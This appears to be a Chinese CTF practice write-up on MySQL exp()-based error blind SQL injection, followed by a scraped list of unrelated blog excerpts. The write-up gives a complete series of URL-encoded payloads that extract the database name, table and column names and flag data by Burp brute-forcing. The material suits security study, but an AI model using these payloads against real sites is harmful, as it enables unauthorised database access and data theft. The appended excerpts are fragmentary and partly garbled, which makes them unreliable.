【exp报错注入】
整数范围
最大整数
exp 函数介绍
报错盲注注入
payload分析
709+C-ASCII 值就等于我们下面的 709+1-1 ,C就是我们要猜的值,当我们猜测的值和ASCII码相等时,那么exp就不会出现报错,因为+1-1还是等于709:
练习
id=1 and 1=1%23 返回hello,admin
id=1' and 1=1%23 返回数据库操作错误
通过上面测试这是一个数字型注入的题目我们直接用下面的payload:
猜测数据库名的长度
id=1 and exp(709%2b4-length(database()))%23
我们看到上面payload里的709%2b4%23是加号的意思这里的意思是709+4,那么为什么要把+号编码呢?因为在burp里+号会被认为是空格,所以需要url编码来编码一下,我们来发包:
这里提示数据库操作错误,因为我们这里的猜测是值是4,出现报错说明我们后面的数据库长度没有四位,因为根据我们的exp(709)大于709会报错的特性,那么数据库长度必然小于4,不然的话不会出现报错,这里我们使用burp的爆破模块来猜测长度,在C的位置打上标记:
这里我们是从大到小猜的,
我们观察发现474为错误信息,4和3之间有个转折点,从原本报错的4变成3后正常了,那么说明我们数据库的长度为3:
下面我们开始猜测数据库名:
猜测数据库名
id=1 and exp(709%2b119-ascii(substr((select database()),1,1)))%23
直接在C打上标记:
因为exp的特性,所以我们需要从大到小开始猜测,ASCII码的可见范围是32~127,那么我们就从127开始猜测:
我们找到报错和正常的转折点的数字,119就是我们所需要的正确的ASCII,第二位第三位都是同理:
猜表名的长度
id=1 and exp(709%2b9-(select length(group_concat(table_name)) from information_schema.tables where table_schema=database()))%23
猜表名的代码里和上次讲的盲注代码类似,变动的地方是exp函数,我们需要猜测的地方是9的位置,同样爆破9的位置,表名通常不会很大,我们只需要在1~10范围内猜测,大概率就可以拿到长度,其他的payload如下,方法都是类似,用burp标记后爆破就可以得出结果:
测试注入点
id=1 and 1=1%23 返回hello,admin
id=1' and 1=1%23 返回数据库操作错误猜测数据库名的长度
id=1 and exp(709%2b4-length(database()))%23猜测数据库名
id=1 and exp(709%2b119-ascii(substr((select database()),1,1)))%23猜表名
id=1 and exp(709%2b103-ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)))%23猜列名长度
id=1 and exp(709%2b4-(select length(group_concat(column_name)) from information_schema.columns where table_name='flag'))%23猜列名
id=1 and exp(709%2b102-ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1)))%23猜数据长度
id=1 and exp(709%2b38-(select length(flag) from flag))%23猜数据
id=1 and exp(709%2b102-ascii(substr((select flag from flag),1,1)))%23
相关文章:
【exp报错注入】
整数范围 最大整数 exp 函数介绍 报错盲注注入 payload分析 709C-ASCII 值就等于我们下面的 7091-1 ,C就是我们要猜的值,当我们猜测的值和ASCII码相等时,那么exp就不会出现报错,因为1-1还是等于709: 练习 id1 an…...
基于SpringBoot问卷调查系统小程序【附源码】
基于SpringBoot问卷调查系统小程序 效果如下: 管理员登录界面 管理员功能界面 调查人管理界面 问卷调查管理界面 问卷题目管理界面 用户登录界面 APP首页界面 公告信息界面 研究背景 随着科学技术的飞速发展,各行各业都在努力与现代先进技术接轨&…...
LLM - 配置 GraphRAG + Ollama 服务 构建 中文知识图谱
欢迎关注我的CSDN:https://spike.blog.csdn.net/ 本文地址:https://spike.blog.csdn.net/article/details/142795151 免责声明:本文来源于个人知识与公开资料,仅用于学术交流,欢迎讨论,不支持转载。 GraphR…...
简单认识redis - 6 redis 存储速度快的原因
1基于内存存储 缓存(内存)读写速度很快,相比于磁盘存储的Mysql 省去了磁盘I/O的次数。 2.高效的数据结构 SDS动态字符串: 1.字符串长度处理:Redis获取字符串长度,时间复杂度为O(1),而C语言中&am…...
【Qt Quick】状态:State 使用
State 是 Qt Quick 中管理界面组件状态的关键工具。它允许我们定义组件的不同状态,并且在用户交互或事件发生时进行状态切换,从而实现属性、外观和行为的动态变化。通过使用 State,可以避免复杂的条件逻辑,使代码更加简洁和可维护…...
ICE/TURN/STUN/Coturn服务器搭建
ICE 当我们想要实现在公网环境下的语音/视频通话功能时,就需要用到ICE交互式连接建立。ICE不是一种协议,整合了 STUN 和 TURN 两种协议(用于 NAT 穿透)的框架。 ICE的主要目标是解决NAT(网络地址转换)穿越…...
ctf.bugku-eval
题目来源:eval - Bugku CTF 访问页面, 代码解释 <?phpinclude "flag.php"; //包含"flag.php"文件$a $_REQUEST[hello]; //从请求参数hello中获取值并赋给变量$a。 eval( "var_dump($a);"); //…...
Extreme Compression of Large Language Models via Additive Quantization阅读
文章目录 Abstract1. Introduction2. Background & Related Work2.1. LLM量化2.2. 最近邻搜索的量化 3.AQLM:Additive Quantization for LLMs3.1. 概述3.1.0 补充**步骤说明****举例说明** 3.2. 阶段1:代码的波束搜索3.3. 阶段2:码本更新3.4. 阶段3&…...
【虚拟化】内核级虚拟化技术KVM介绍,全/半虚拟化的区别,使用libvirt搭建虚拟化平台(go/java/c++)
【虚拟化】内核级虚拟化技术KVM介绍,全/半虚拟化的区别,使用libvirt搭建虚拟化平台(go/java/c) 文章目录 1、虚拟化技术分类与架构(KVM,Xen),全/半虚拟化的区别2、libvirt介绍3、使用…...
C++类成员变量的初始化
1、优先使用或{} 类的非静态数据成员在声明时,使用或{}进行初始化执行默认初始化,构造函数只处理一些特殊成员。 2、直接初始化 使用()进行初始化、new运算符和类构造函数的初始化列表。 3、拷贝初始化 使用进行初始化、函数传参、函数返回值。 隐式调用…...
Golang 中的强大 TUI 库 ——tview
在命令行界面下创建丰富的用户交互界面是许多开发者的需求,而 Golang 语言中有一个非常出色的 TUI(文本用户界面)库 ——tview。本文将详细介绍 tview 库,并与其他流行的 TUI 库进行对比,最后进行总结。 一、tview 库介…...
电层相关 -- 支路板与线路板
华为OTN产品系列支持 支路板、线路板分离架构 。支路/线路板和集中交叉单板配合使用,除了可以完成OTU单板功能外,还可通过集中交叉单板进行各级别ODUk颗粒业务调度, 实现更加灵活的电层信号调度及更高的带宽利用率。 支路板 功能 实现客户…...
leetcode 93.复原ip地址
1.题目要求: 2.题目代码: class Solution { public:vector<string> result;// 记录结果// startIndex: 搜索的起始位置,pointNum:添加逗点的数量void backtracking(string& s, int startIndex, int pointNum) {if (pointNum 3) { // 逗点数…...
AI+视频监控:EasyCVR安防平台赋能火电制造行业的视频智能管理方案
随着信息技术的飞速发展和智能制造的深入推进,火电制造行业作为国民经济的重要组成部分,正面临着智能化转型的迫切需求。为了提升生产效率、保障设备安全、优化管理流程,火电制造企业迫切需要引入先进的视频监控与人工智能技术。EasyCVR安防监…...
UIP协议栈 TCP Server Client通信成功案例
文章目录 这里边有相当好的 [UIP 文档资料,文档位置在仓库的UIP/uip doc ,括号内是仓库地址(https://gitee.com/free-people-in-time-and-space/net-work-learn-note.git )TCP Server1.main循环里做的事2.以下是main循环里相关函数…...
Android Studio Koala Feature Drop 稳定版现已推出
作者 / Android Studio 产品经理 Sandhya Mohan Android Studio Koala Feature Drop (2024.1.2) 现已推出!🐨 🔗 Android Studio https://developer.android.google.cn/studio 今年早些时候,我们宣布每个 Android Studio 动物版本…...
胤娲科技:AI评估新纪元——LightEval引领透明化与定制化浪潮
AI评估的迷雾,LightEval能否拨云见日? 想象一下,你是一位AI模型的开发者,精心打造了一个智能助手,却在最终评估阶段遭遇了意外的“滑铁卢”。 问题出在哪里?是模型本身不够聪明,还是评估标准太过…...
Python安装|PyCharm Professional 下载安装教程。2024最新版,亲测使用!
一、下载地址: 二、Python的下载及安装: 1、从上面网址进入Python官网 2、安装流程图: 双击已经下载好的python-*.*.*-amd64.exe文件,开始安装 最后就等它自己安装完成就好了 3、检验是否安装完成: windowsR快捷键…...
JavaSwitch控制流语句
在Java中,switch语句是一种控制流语句,用于根据变量的不同值执行不同的代码块。它提供了一种替代if-else语句的方式,使代码更简洁和易于阅读。以下是switch语句的基本语法和使用示例。 基本语法 switch (expression) {case value1:// 执行代码…...
PCL 3D-SIFT关键点检测(Z方向梯度约束
目录 一、概述 1.1原理 1.2实现步骤 1.3应用场景 二、代码实现 2.1关键函数 2.1.1 SIFT关键点检测 2.1.2 可视化函数 2.2完整代码 三、实现效果 PCL点云算法汇总及实战案例汇总的目录地址链接: PCL点云算法与项目实战案例汇总(长期更新&#…...
ClawdBot优化升级:如何配置国内大模型,提升响应速度与效果
ClawdBot优化升级:如何配置国内大模型,提升响应速度与效果 1. 项目概述 ClawdBot(现更名为MoltBot)是一款开源的个人AI助手工具,它能够在本地设备上运行,通过vLLM提供后端模型能力。这个工具特别适合开发…...
效率提升:用快马AI一键生成医院预约系统的核心排班管理代码
医院预约系统开发笔记:如何用AI快速搞定排班管理模块 最近在开发一个医院预约系统,发现排班管理模块特别费时间。传统的开发方式需要手动编写大量重复性代码,从数据库设计到API接口,再到各种业务逻辑校验,一个完整的排…...
YOLOv8鹰眼检测实战:无人机巡检场景下的目标识别应用
YOLOv8鹰眼检测实战:无人机巡检场景下的目标识别应用 1. 无人机巡检的视觉挑战与解决方案 在电力线路巡查、交通监控、农业勘测等场景中,无人机正成为不可或缺的空中巡检工具。然而传统人工分析航拍图像的方式存在效率低下、漏检率高、响应延迟等问题。…...
MetaGPT终极指南:5步开启AI驱动软件开发新时代
MetaGPT终极指南:5步开启AI驱动软件开发新时代 【免费下载链接】MetaGPT 🌟 The Multi-Agent Framework: First AI Software Company, Towards Natural Language Programming 项目地址: https://gitcode.com/GitHub_Trending/me/MetaGPT MetaGPT是…...
【Coze】从零开始:AI Agent开发平台的入门指南
1. Coze平台初体验:零基础也能玩转AI开发 第一次接触Coze时,我完全被它的易用性震惊了。作为一个没有任何编程背景的市场专员,我居然在半小时内就做出了能自动回复客户咨询的AI助手。这个由字节跳动开发的AI Agent开发平台,真正实…...
SDMatte效果对比评测:与传统抠图工具及在线API的全面比拼
SDMatte效果对比评测:与传统抠图工具及在线API的全面比拼 1. 开篇:为什么需要新的抠图方案 在数字内容创作领域,抠图一直是个让人又爱又恨的技术活。记得去年帮朋友做电商产品图,光是给20个商品抠图就花了我整整一个周末。传统工…...
:动态数据流与交互优化实战)
QT 基于qcustomplot实现热力图(四):动态数据流与交互优化实战
1. 动态数据流的核心实现策略 在实时监控系统中,热力图的数据往往需要持续更新。我遇到过不少开发者直接粗暴地全量刷新整个数据集,结果界面卡顿得像老式幻灯片。这里分享三种经过实战检验的动态更新方案,每种都有其适用场景。 增量更新法最适…...
P3C黄山版突破式迁移指南:无缝升级Java代码规范检查体系
P3C黄山版突破式迁移指南:无缝升级Java代码规范检查体系 【免费下载链接】p3c Alibaba Java Coding Guidelines pmd implements and IDE plugin 项目地址: https://gitcode.com/gh_mirrors/p3/p3c 在Java开发团队中,代码规范检查工具的升级往往伴…...
)
嵌入式图像处理实战:中值滤波 vs 均值滤波在STM32上的性能对比(附代码)
嵌入式图像处理实战:中值滤波 vs 均值滤波在STM32上的性能对比(附代码) 在机器人视觉或工业检测系统中,一个突如其来的像素噪点可能导致整个识别算法崩溃。我曾亲眼见证过某产线机械臂因图像传感器受到电磁干扰,将正常…...
)
手把手教你用Cline插件5分钟搞定DeepSeek-R1模型接入(附硅基流动平台2000万Token福利)
5分钟极速上手:用Cline插件无缝对接DeepSeek-R1大模型实战指南 当你第一次听说只需要5分钟就能让一个强大的AI模型为你工作时,可能会觉得这像是某种夸张的营销话术。但作为一个曾经花了整整三天时间才搞定第一个模型接入的开发者,我可以负责任…...